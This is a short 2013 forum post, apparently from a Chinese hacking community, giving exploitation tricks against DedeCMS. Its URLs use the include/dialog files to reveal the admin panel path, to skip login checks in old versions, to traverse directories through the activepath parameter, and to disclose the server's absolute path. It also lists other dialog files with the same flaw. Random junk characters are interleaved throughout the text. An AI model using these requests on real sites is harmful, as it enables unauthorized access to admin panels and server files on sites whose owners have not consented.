找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2223|回复: 0
打印 上一主题 下一主题

dedecms爆后台文件技巧

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-16 16:50:43 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
1.include/dialog/select_soft.php文件可以爆出DEDECMS的后台,以前的老板本可以跳过登陆验证直接访问,无需管理1 F, K- x# l' Y2 e: o$ y  q
2 Y5 m3 }2 Q' W9 a6 B
员帐号,新版本的就直接转向了后台.5 y, h/ x% }3 n% s" ]% e
2 O+ n# h6 i" O
2.include/dialog/config.php会爆出后台管理路径
! J" n3 p8 \& D% f  S( G3 Y
# e2 i$ }+ e/ r3.include/dialog/select_soft.php?activepath=/include/FCKeditor 跳转目录
- {, R1 t, D7 i+ B- |( j# |0 W% A7 l9 b& o+ K, h+ s: _
4.include/dialog/select_soft.php?activepath=/st0pst0pst0pst0pst0pst0pst0pst0p 爆出网站绝对路径./ c( I. n3 X# X: m
6 D: X* L- Q: _. g" W3 B1 L
5.另外一些低版本的DEDECMS访问这个页面的时候会直接跳过登陆验证,直接显示,而且还可以用/././././././././掉
/ d  g4 @/ |$ p, O; D0 s' j$ b" s1 Z" t2 X2 r
到根目录去.不过这些版本的访问地址有些不同.- u/ j% e! B! V! `0 l' b
地址为require/dialog/select_soft.php?activepath=/././././././././
7 z* a) K/ O% k- N  G' m! I% M* r# ~2 `: e) f; @  n
include\dialog\目录下的另外几个文件都存在同一个问题,只是默认设的目录不同.有些可以查看HTML这些文件哦..  c8 q: t& Z$ N2 V% @* }
存在相同问题的文件还有2 Z2 s; K1 [" Y" |+ [
include\dialog\select_images.php0 u) c! R- K7 r: e
include\dialog\select_media.php/ I+ ?- w9 @  |: B$ u2 n
include\dialog\select_templets.php​
* u2 `* s* }: s5 A% i
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表